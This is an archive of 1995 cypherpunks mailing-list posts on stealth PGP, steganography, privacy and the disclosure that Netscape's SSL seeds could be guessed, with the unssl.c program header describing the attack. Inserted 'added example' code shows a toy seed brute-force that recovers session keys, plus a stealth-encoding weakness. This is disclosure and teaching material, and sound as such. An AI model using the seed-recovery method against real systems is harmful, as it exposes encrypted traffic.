Message-ID: <20045.9509171928@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@polaris.mindport.net> writes:
>
> 3. Unescrowed crypto banned, with advanced stego, panic passwords, 
> stealth PGP, incorporated remailers all across international borders 
> making offenders impossible to identify or catch.
> 
> [...] I believe the goal is to propagate crypto far enough to at
> least have a salient "underground" participants.
> 
> Some months ago I called for advanced stego and stealth PGP as well
> as larger keys in the event we all had to go "into the crypto
> closet" for a time.
> 
> I call for them again.

Guess you're saying that a future underground cypherpunk group is
going to need tools to continue if the US plummets into cryptographic
darkness.  And you'd like to see these tools available now, as it will
be difficult to distribute, and set up if the big ban is already on
us.  A pre-emptive safety precaution in the event that it happens.

So what threat model do you envisage tools being needed to withstand?

A couple of the things you list are realisable with little effort, one
is a PGP with large keys, I am using a doctored to go to 16k keys (I
did this to amuse myself with getting timings for how long encrypt /
decrypt & keygen take for varying key sizes).  The patch is small, and
easy to figure out, just a couple of #ifdefs, various people posted
their patches to do this to alt.security.pgp some time ago.  I think
there was at least one patched version of PGP distributed
(unofficially of course - PGPs largest allowed key size being 2048
bits), though I don't have any URLs for such a beast.  Part of the
problem is people seem to frown on distributing PGPs with larger keys,
or alternate versions of PGP, due to version control issues, and such.
Technically easy to do tho.

Adding stealth features to PGP, or even as standalone, aren't hard
either.  I've been trying to add Hal's improved stealth algorithm to
Henry Hastur's stealth program.  It's basically finished, except for
the problem that I am unsure about the security of the construct:

	x' = f(MD5(x)) * N + x

where 0 < x < N
and   0 < x' < M where M is a power of 2, and M > 2^64 * N
and f is just a scaling function

If that is secure I'd be happy to release an updated version of
stealth, but without assurance, it is necessary to include random
numbers, and the best way I see to achieve that is to build it in to
PGP, and use PGP's ran no utils directly.

If you're talking about a different version of PGP, perhaps this
wouldn't be a big deal anyway.

So that's big key PGP, and stealth PGP.  I'm presuming most people
figure 128 bit IDEA is suitably unassailable, but RSA keys are a
moving target, and less predictable due to improvements in factoring
algorithms.  Already people are talking about an academic RSA129 like
attempt on a 512 bit PGP key.

What are views about creating Yet Another version of PGP.  I've read a
few discussions of this kind of thing in the past on alt.security.pgp,
and most people were against it.  But I think some useful things could
come out of it.

The other problem is working with pgp2.x when there is a version 3.0
being worked on, not sure what stage 3.0 is at, any coding.. perhaps
if a stealth capable pgp2.x was worked on, and a few features
demonstrated, the 3.0 folks would be willing to take a look at it to
evaluate the features for possible version 3.0 inclusion.

Just don't want to go do a lot of work, and then get a polite cease and
desist from those with interests in managing the version control of
PGP.

Good stego tools are the other main problem.

My understanding is that all of the stego programs to date do it by
just ripping out the LSB of an audio or graphic image, and replacing
that with the bits from a message with a stealthed message.

Sending masses of pictures around is kind of suspicious tho, I mean
several a day, each freshly scanned from what?  I guess if video
conferencing gets here, it would be fun to add the stego into that
noisy stream, same for internet phone.

Text stego, with bits hidden in the entropy of english text seems a
harder objective, but a useful one.

I'm presuming that plausible deniability, and facilities for anonymity
are essentials.  How does one go about doing that?  Using newsgroups
to carry on a two level communication might be a good way of
maintaining plausible deniability.  Either a stego interface to
remailers in other countries, so that the stego gateway to remailers
scans its newspool, decrypts messages addressed to it, and forwards
that off to the anon remailers.  The outcome could be a further text
or graphics stegoed message for posting to a suitably high noise news
group.  The recipient is also scanning his news spool for stego
messages addressed to him.

Sounds feasible.  Perhaps a proof of concept would be easy to knock
up, if a place holder is inserted for the 'good text stego' program
should go.  There was a 'texto' posted a while ago which did something
suitable.

Adam
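
The construct asked about in the message above, worked through as an added
example (not code from stealth, PGP, or anyone on the list).  It assumes f
scales the 128-bit MD5 digest linearly into the multiplier range [0, M/N) and
uses constructed 512-bit integers in place of real RSA moduli.  It shows that
a multiplier derived from x can be recomputed by anyone holding a candidate
public modulus, while a randomly chosen multiplier cannot.

```python
import hashlib
import secrets

KEY_BITS = 512                   # size class of the moduli used here
M = 1 << (KEY_BITS + 64)         # power of 2, so M > 2^64 * N for any 512-bit N


def _constructed_modulus(label: bytes) -> int:
    """Stand-in for a public modulus: a fixed odd 512-bit integer, not a real key."""
    raw = hashlib.sha512(label).digest()              # 64 bytes = 512 bits
    return int.from_bytes(raw, "big") | (1 << (KEY_BITS - 1)) | 1


# Constructed sample data (assumptions for this example only).
N_ALICE = _constructed_modulus(b"constructed modulus A")
N_BOB = _constructed_modulus(b"constructed modulus B")
KEYRING = {"alice": N_ALICE, "bob": N_BOB}
X_SAMPLE = int.from_bytes(
    hashlib.sha512(b"constructed ciphertext").digest(), "big"
) % (N_ALICE - 1) + 1                                 # guarantees 0 < x < N_ALICE


def multiplier_range(n: int) -> int:
    """Number of multipliers k for which k*n + x stays below M."""
    return M // n


def f_md5(x: int, n: int) -> int:
    """Assumed form of f: scale MD5(x) from [0, 2^128) into [0, M // n)."""
    digest = hashlib.md5(x.to_bytes(KEY_BITS // 8, "big")).digest()
    return (int.from_bytes(digest, "big") * multiplier_range(n)) >> 128


def _check_range(x: int, n: int) -> None:
    if not 0 < x < n:
        raise ValueError("x must satisfy 0 < x < N")


def encode_deterministic(x: int, n: int) -> int:
    """x' = f(MD5(x)) * N + x, the construct from the message."""
    _check_range(x, n)
    return f_md5(x, n) * n + x


def encode_random(x: int, n: int) -> int:
    """Same shape, but the multiplier comes from a CSPRNG instead of MD5(x)."""
    _check_range(x, n)
    return secrets.randbelow(multiplier_range(n)) * n + x


def decode(x_prime: int, n: int) -> int:
    """The recipient recovers x by reducing modulo their own modulus."""
    return x_prime % n


def consistent_with_key(x_prime: int, n: int) -> bool:
    """Check available to any observer who holds a candidate public modulus.

    Split x' into (k, x) and recompute the multiplier from x.  A match happens
    for the modulus actually used; for any other modulus it happens with
    probability about 1 / multiplier_range(n), i.e. below 2^-64.
    """
    k, x = divmod(x_prime, n)
    return x > 0 and k == f_md5(x, n)


def candidate_recipients(x_prime: int, keyring: dict) -> list:
    """Names in the keyring whose modulus is consistent with x'."""
    return [name for name, n in keyring.items() if consistent_with_key(x_prime, n)]


if __name__ == "__main__":
    det = encode_deterministic(X_SAMPLE, N_ALICE)
    rnd = encode_random(X_SAMPLE, N_ALICE)
    print("deterministic multiplier ->", candidate_recipients(det, KEYRING))
    print("random multiplier        ->", candidate_recipients(rnd, KEYRING))
```

With the multiplier taken from MD5(x) the encoded value is self-checking
against the right public modulus, so it no longer hides which key it was
encrypted to; with a random multiplier every modulus in the size class
decomposes x' equally well.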





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Sun, 17 Sep 95 17:37:11 PDT
To: cypherpunks@toad.com
Subject: Joe Sixpack and his TV
Message-ID: <Pine.3.89.9509172041.B83388-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any 
other kind of crypto, would it maybe, possibly have to do with a lack
of exposure to it on the soap operas of their favorite media, ie TV? Hmmm.

The general level of paranoia on X-Files (100 million viewers all over the 
world, rabid internet following) is even higher than on this list, and 
the usual discussions on this list would read like a free vacation to their
scriptwriters and researchers. Anyone have any scriptwriting skills?
100 million potential subscribers to toad are at stake... (Yes I guess then
we'd have to move to usenet distribution. But think how entertaining our
flames wars would become. Yes I'm definitely calling for it, and the big 
house with the hot tub would be nice too. Only half joking. Honestly though, 
anyone want to find out their email addresses and send out a gratis 
subscription to toad? A script would be nice too. It's better exposure 
than five seconds of Tim with Connie Chung.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Sep 95 17:58:26 PDT
To: cypherpunks@toad.com
Subject: Re: Joe Sixpack and his TV
Message-ID: <v02120d01ac8271596519@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>(...It's better exposure
>than five seconds of Tim with Connie Chung.)

Connie: "So it's really true that you're an anarchist? That you believe that
         semi-*automatic weapons* and strong *cryptography* should be *freely*
         available to *everyone*? and that strong cryptography on a *public*
         network like the *internet* will bring about the collapse of nation
         states all over the *world*?"

Tim:    "Yes."

Connie: "But, what about *democracy*? What the will of the *people*?"

Tim:    "What about them?"

A little more than 5 seconds, but I believe that captures her inflection
pretty nicely, don't you think?

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew V. Kovalev <Andrew.V.Kovalev@jet.msk.su>
Date: Sun, 17 Sep 95 10:06:38 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID: <m0suNA5-0000zSC@jet.msk.su>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Laurent Demailly wrote:
> 
> Aleph One writes:
>  > What's the problem of using CERN in proxy mode? You can even set it up 
>  > to do chaining.
> The chaining is not dynamic (but it is maybe patchable) ? 
> I don't think there is support for encryption (ssl patches maybe?) ?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do... 
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...
> 

I am almost sure that new TIS http-gw will do. Especially if ssl will be
added by some kind soul..

				avk

- -- 
- ---
  \/\/\/ Andrew.V.Kovalev@jet.msk.su     +7-095-973-4848 office 
 Security is like defecation - unpleasant, but alternatives are worse.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQBFAwUBMFxVZvLk60Co0vEHAQHYTQF+OWKil3l+o1gGQNw4jpWseQL80Fi9YwRc
ydyRvfkmnFn+5hhpQXLVSlS+WwyWNt1G
=TYGa
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 18:12:24 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <v02120d01ac8271596519@[199.0.65.105]>
Message-ID: <199509180112.VAA28385@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It also captures Tim nicely. I'll point out, though, that exchanges
like that can be handled properly or badly. Doing it right means
answering truthfully but in a way that explains your position rather
than alienating the audience.

When you have time to answer questions like that (TV isn't a medium
suitable for this) the right way to answer the last one is to do
something like referencing Thoreau. By the way, I like the opening of
Civil Disobedience so much I thought I'd post it.

         I heartily accept the  motto, "That government is  best
    which governs least"; and I should  like to see it acted  up
    to more rapidly and systematically.  Carried out, it finally
    amounts to this, which  also I believe--"That government  is
    best which governs not  at all"; and  when men are  prepared
    for it, that will be the  kind of government which they will
    have.

Perry

Robert Hettinga writes:
> >(...It's better exposure
> >than five seconds of Tim with Connie Chung.)
> 
> Connie: "So it's really true that you're an anarchist? That you believe that
>          semi-*automatic weapons* and strong *cryptography* should
>          be *freely* available to *everyone*? and that strong
>          cryptography on a *public* network like the *internet* will
>          bring about the collapse of nation states all over the
>          *world*?"
> 
> Tim:    "Yes."
> 
> Connie: "But, what about *democracy*? What the will of the *people*?"
> 
> Tim:    "What about them?"
> 
> A little more than 5 seconds, but I believe that captures her inflection
> pretty nicely, don't you think?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 18:19:52 PDT
To: s675570@aix2.uottawa.ca
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <Pine.3.89.9509172041.B83388-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.950917211934.20712A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 s675570@aix2.uottawa.ca wrote:

> If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any 
> other kind of crypto, would it maybe, possibly have to do with a lack
> of exposure to it on the soap operas of their favorite media, ie TV? Hmmm.
> 
> The general level of paranoia on X-Files (100 million viewers all over the 
> world, rabid internet following) is even higher than on this list, and 
> the usual discussions on this list would read like a free vacation to their
> scriptwriters and researchers. Anyone have any scriptwriting skills?
> 100 million potential subscribers to toad are at stake... (Yes I guess then
> we'd have to move to usenet distribution. But think how entertaining our
> flames wars would become. Yes I'm definitely calling for it, and the big 
> house with the hot tub would be nice too. Only half joking. Honestly though, 
> anyone want to find out their email addresses and send out a gratis 
> subscription to toad? A script would be nice too. It's better exposure 
> than five seconds of Tim with Connie Chung.)
> 


As I understand it shows like "The X-Files" don't accept unsolicited 
scripts.  Not surprising as I'm sure they have writer's agreements.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Sun, 17 Sep 95 21:41:08 PDT
To: cypherpunks@toad.com
Subject: Netscape SSL implementation cracked!
Message-ID: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As some of you may recall, a few weeks ago I posted a
reverse-compilation of the random number generation routine used by
netscape to choose challenge data and encryption keys.

Recently, one of my officemates (David Wagner <daw@cs.berkeley.edu>)
and I (Ian Goldberg <iang@cs.berkeley.edu>) finished the job
of seeing exactly how the encryption keys are picked.

What we discovered is that, at least on the systems we checked (Solaris
and HP-UX), the seed value for the RNG was fairly trivial to guess by
someone with an account on the machine running netscape (so much so
that in this situation, it usually takes less than 1 minute to find
the key), and not too hard for people without accounts, either.
See below for details.

I've included the header to a program we wrote to do this key-cracking
below.  I would like to get some information, though:

o Where should I put the full source (1 file, ~12k) so that ITAR lovers
  don't get mad at me?

o Where can I find a version of netscape that does RC4-128?  It is
  likely that it suffers from the same problem, and even a brute-force
  search of the entire seed space is _much_ less than 128 bits.

Happy hacking,

   - Ian "who just saw _Hackers_ today with some other Bay Area cypherpunks,
           and it put me in the mood"

/* unssl.c - Last update: 950917

   Break netscape's shoddy implementation of SSL on some platforms
   (tested for netscape running RC4-40 on Solaris and HP-UX; other
    Unices are probably similar; other crypt methods are unknown, but
    it is likely that RC4-128 will have the same problems).

   The idea is this: netscape seeds the random number generator it uses
   to produce challenge-data and master keys with a combination of the
   time in seconds and microseconds, the pid and the ppid.  Of these,
   only the microseconds is hard to determine by someone who
   (a) can watch your packets on the network and
   (b) has access to any account on the system running netscape.

   Even if (b) is not satisfied, the time can often be obtained from
   the time or daytime network daemons; an approximation to the pid can
   sometimes be obtained from a mail daemon (the pid is part of most
   Message-ID's); the ppid will usually be not much smaller than the pid,
   and has a higher than average chance of being 1.  Clever guessing
   of these values will in all likelihood cut the expected search space
   down to less than brute-forcing a 40-bit key, and certainly is less
   than brute-forcing a 128-bit key.

   Subsequent https: connections after the first (even to different hosts)
   seem to _not_ reseed the RNG.  This makes things much easier, once
   you've broken the first message.  Just keep generating 16 bytes of
   random numbers until you get the challenge-data for the next message.
   The next key will then be the 16 random bytes after that.

   main() and bits of MD5Transform1 by Ian Goldberg <iang@cs.berkeley.edu>
   and David Wagner <daw@cs.berkeley.edu>.  The rest is taken from the
   standard MD5 code; see below.

   This code seems to want to run on a big-endian machine.  There may be
   other problems as well.  This code is provided as-is; if it causes you
   to lose your data, sleep, civil liberties, or SO, that's your problem.

#include <std/disclaimer.h>

   On the command line, give the time in seconds, the pid, the ppid and
   the SSL challenge data (each byte in hex, separated by some non-hex
   character like a colon) of the _first_ SSL message generated by
   the instance of netscape.  This program will search through the
   microsecond values.  You may need to run it again with a slightly
   different value for the seconds, depending on how accurately you know
   the time on the system running netscape.  The output will be the
   master key (all 16 bytes; note you never even told the program the
   11 bytes you knew) and the value for the microseconds that produced it.

   As a benchmark, this code runs in just under 25 seconds real time
   (for an unsuccessful search through 1<<20 values for the microseconds)
   on an unloaded HP 712/80.
*/
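
The seed-space argument in the header above, as an added C example that is neither the unssl.c source nor Netscape's code: a stand-in generator is seeded from seconds, microseconds, pid and ppid, and an audit routine shows that the cleartext challenge plus the three guessable inputs pins down the key in at most about 2^20 trials per candidate second. The splitmix64 mixer (in place of the MD5-based routine), all function names and all sample values are constructed assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHALLENGE_LEN 16
#define KEY_LEN 16
#define USEC_PER_SEC 1000000UL

/* Stand-in 64-bit mixer (the splitmix64 finalizer). Assumption: it takes the
   place of the MD5-based routine the post refers to, which is not reproduced. */
static uint64_t mix64(uint64_t z) {
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

typedef struct { uint64_t state; } toy_rng;

/* Seed from the four inputs the post names: seconds, microseconds, pid, ppid. */
static void toy_seed(toy_rng *r, uint32_t sec, uint32_t usec,
                     uint32_t pid, uint32_t ppid) {
    uint64_t s = mix64(sec);
    s = mix64(s ^ usec);
    s = mix64(s ^ pid);
    r->state = mix64(s ^ ppid);
}

/* Produce n output bytes, advancing the state once per 8 bytes. */
static void toy_bytes(toy_rng *r, uint8_t *out, size_t n) {
    uint64_t word = 0;
    size_t i;
    for (i = 0; i < n; i++) {
        if (i % 8 == 0) {
            r->state += 0x9E3779B97F4A7C15ULL;
            word = mix64(r->state);
        }
        out[i] = (uint8_t)(word >> (8 * (i % 8)));
    }
}

/* One session: the challenge crosses the network in clear, the key does not.
   The generator is not reseeded between sessions, as the post observes. */
static void toy_session(toy_rng *r, uint8_t challenge[CHALLENGE_LEN],
                        uint8_t key[KEY_LEN]) {
    toy_bytes(r, challenge, CHALLENGE_LEN);
    toy_bytes(r, key, KEY_LEN);
}

/* Seed-space audit: with pid and ppid known and the time known to within
   [sec_lo, sec_hi], enumerate the microseconds until the regenerated challenge
   equals the observed one. Returns the number of seeds tried (0 if no match);
   on a match, key_out holds the session key and rng_out the generator state
   from which every later session follows. */
static unsigned long audit_seed(uint32_t sec_lo, uint32_t sec_hi,
                                uint32_t pid, uint32_t ppid,
                                const uint8_t observed[CHALLENGE_LEN],
                                toy_rng *rng_out, uint8_t key_out[KEY_LEN],
                                uint32_t *usec_out) {
    unsigned long tried = 0;
    uint64_t sec;
    uint32_t usec;
    for (sec = sec_lo; sec <= sec_hi; sec++) {
        for (usec = 0; usec < USEC_PER_SEC; usec++) {
            toy_rng r;
            uint8_t challenge[CHALLENGE_LEN];
            toy_seed(&r, (uint32_t)sec, usec, pid, ppid);
            toy_bytes(&r, challenge, CHALLENGE_LEN);
            tried++;
            if (memcmp(challenge, observed, CHALLENGE_LEN) == 0) {
                toy_bytes(&r, key_out, KEY_LEN);
                *rng_out = r;
                *usec_out = usec;
                return tried;
            }
        }
    }
    return 0;
}

/* Smallest b with 2^b >= n: effective key strength when only n seeds exist. */
static unsigned seed_space_bits(uint64_t n) {
    unsigned b = 0;
    while (b < 64 && ((uint64_t)1 << b) < n) b++;
    return b;
}

int main(void) {
    /* Constructed sample values, not taken from any real capture. */
    const uint32_t sec = 811399268u, usec = 271828u, pid = 1234u, ppid = 1u;
    toy_rng client, recovered;
    uint8_t ch[CHALLENGE_LEN], key[KEY_LEN], found[KEY_LEN] = {0};
    uint32_t found_usec = 0;
    unsigned long tried;

    toy_seed(&client, sec, usec, pid, ppid);
    toy_session(&client, ch, key);
    tried = audit_seed(sec - 1, sec + 1, pid, ppid, ch,
                       &recovered, found, &found_usec);
    printf("seeds tried: %lu, usec: %u, key recovered: %s\n", tried,
           (unsigned)found_usec, memcmp(found, key, KEY_LEN) == 0 ? "yes" : "no");
    printf("3-second window is %u bits of seed, whatever the key length\n",
           seed_space_bits(3 * USEC_PER_SEC));
    return 0;
}
```

A longer key does not help here: the key is only as strong as the seed, so the seed must carry at least as many unpredictable bits as the key it produces.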



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 17 Sep 95 22:15:27 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <Pine.SUN.3.91.950917211934.20712A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950917220640.2823A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 17 Sep 1995, Black Unicorn wrote:

> As I understand it shows like "The X-Files" don't accept unsolicited 
> scripts.  Not surprising as I'm sure they have writer's agreements.

Nobody accepts unsolicited scripts for legal reasons.  The real 
question is, do they accept outside scripts?  Some shows do; some
shows don't.  IF they do, they will send freelance writers a show
"bible," which is a writer's guide to the basic rules concerning
the structure, history, characters, etc. of the show.  If you're
interested, you should drop them a note asking if they accept
scripts from outsiders.  Giving the production offices a call
would let you know what their attitude is about submissions.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 15:40:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Attachments"
In-Reply-To: <ac81e3df200210046fa3@[205.199.118.202]>
Message-ID: <m0suSN5-000LcjC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It wasn't.  It was a monopart MIME message of type application/pgp.
Check your mailer config.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sal@panix.com (Sal Denaro)
Date: Mon, 18 Sep 95 21:30:20 PDT
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: AOL monitoring
In-Reply-To: <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>
Message-ID: <+3OXwAgbBgzR084yn@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>, you wrote:
> A further hint as to why this won't work:  the client software doesn't 
> keep track of which messages you've read in a discussion area, AOL's 
> servers do.  How do I know this?  Because I use AOL on a Mac from home, 

Ohhh-God, not again...

Can anyone remember the Prodigy rumor? How IBM was snooping around
your hard disk, and it turned out to be nothing but a swapfile. Does
"Good times" ring a bell? And don't get me started on MicroSoft 
Network rumors...

1) 90% of the FTP sites I use mention that they log xfers.

2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600

3) My address book shows who I send mail often enough to warrant me
   putting in a nickname.

4) My sent-mail folder shows who I sent mail to in the past year.

5) My bookmark file shows that I read the NYC-Speedtraps page one or
   two times a week.

I am sure that AOL, Prodigy, CompuServe and Acme Internet all log what 
mail/news/web pages/ftp sites you have visited, in one way or another.
Does this bother me? A little. I use a local Internet provider with
an OS I understand enough to know what is logged and what is not logged.
My fear is not LEA, but crackers. As long as I make myself a hard
target- the vultures will look elsewhere. I repeat this like a mantra 
yet no one believes me- IF YOU WANT PRIVACY, DON'T USE THE PHONE. Once 
the headset is raised, big brother is online. If you do not like those
rules, don't play the game.

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Sun, 17 Sep 95 22:27:32 PDT
To: iang@CS.Berkeley.EDU (Ian Goldberg)
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <305d030d0527002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Ian Goldberg said:
> 
> As some of you may recall, a few weeks ago I posted a
> reverse-compilation of the random number generation routine used by
> netscape to choose challenge data and encryption keys.
> 
> Recently, one of my officemates (David Wagner <daw@cs.berkeley.edu>)
> and I (Ian Goldberg <iang@cs.berkeley.edu>) finished the job
> of seeing exactly how the encryption keys are picked.
> 
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.

Makes one wonder what the seed is on a Windows implementation...
If it's only the time, you can probably approximate what the
clock is set to within a couple of minutes (if the timezone of the
client is known). 

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sun, 17 Sep 95 22:42:15 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <305d030d0527002@noc.cis.umn.edu>
Message-ID: <m0suYvx-00063jC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Kevin L Prigge wrote:
 
 A little birdie told me that Ian Goldberg said:

 > What we discovered is that, at least on the systems we checked (Solaris
 > and HP-UX), the seed value for the RNG was fairly trivial to guess by
 > someone with an account on the machine running netscape (so much so
 > that in this situation, it usually takes less than 1 minute to find
 > the key), and not too hard for people without accounts, either.
 
/ Makes one wonder what the seed is on a Windows implementation...
/ If it's only the time, you can probably approximate what the
/ clock is set to within a couple of minutes (if the timezone of the
/ client is known). 
 
Hah! Like a Cmos clock can *ever* keep a consistent time for more than
two minutes...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 22:09:52 PDT
To: Ian Goldberg <iang@CS.Berkeley.EDU>
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.950918011024.24473A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




Excellent work!



---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 22:27:10 PDT
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <199509180527.BAA28782@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ian Goldberg writes:
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.
> See below for details.

Why is this completely unsurprising?

I've said it before and I'll say it again -- Netscape's programmers
(with a few notable exceptions -- you know who you are) tend to be
sloppy about security critical details.  Experience with most of the
same people from back when they built Mosaic shows that they just
don't get the details right. (I wonder how many buffer overflow
security bugs lurk in Netscape waiting to be found. I wonder how many
such bugs lurk in their web servers, too...)

Anyway, congratulations to you and Dave on an excellent piece of
work. I say a bunch of us should buy you "I broke Netscape's security
and all I got was this lousy T-Shirt" shirts, if only someone would
design them!

(Two of those should be given to our friends in the U.K. and at INRIA
who brute forced Netscape before. A dozen more of the shirts should be
held for future breaks -- which are a "when", not an "if".)

> I've included the header to a program we wrote to do this key-cracking
> below.  I would like to get some information, though:
> 
> o Where should I put the full source (1 file, ~12k) so that ITAR lovers
>   don't get mad at me?

Give it to the folks at ftp.csua.berkeley.edu, I say.

> o Where can I find a version of netscape that does RC4-128?  It is
>   likely that it suffers from the same problem, and even a brute-force
>   search of the entire seed space is _much_ less than 128 bits.

They sell it in stores.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 22:30:10 PDT
To: Christian Wettergren <cwe@it.kth.se>
Subject: Re: Netscape SSL implementation is broken!
In-Reply-To: <199509180525.HAA06519@piraya.electrum.kth.se>
Message-ID: <199509180529.BAA28806@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Christian Wettergren writes:
> I guess we should send them the draft-ietf-security-randomness-00.txt
> asap.

I thought that was an RFC by now.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: acollier@crl.com
Date: Sun, 17 Sep 95 18:59:49 PDT
To: cypherpunks@toad.com
Subject: Re: FAX Encryption Software
In-Reply-To: <43hvft$n2b@news1.deltanet.com>
Message-ID: <43ii1t$210@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


clav@deltanet.com wrote:

>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???

>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>encryption package called PrivaSoft.

>Unlike any previously devised system, this method protects, with 
>only 4 mouse clicks, fax and email transmissions in electronic 
>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT 
>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. 
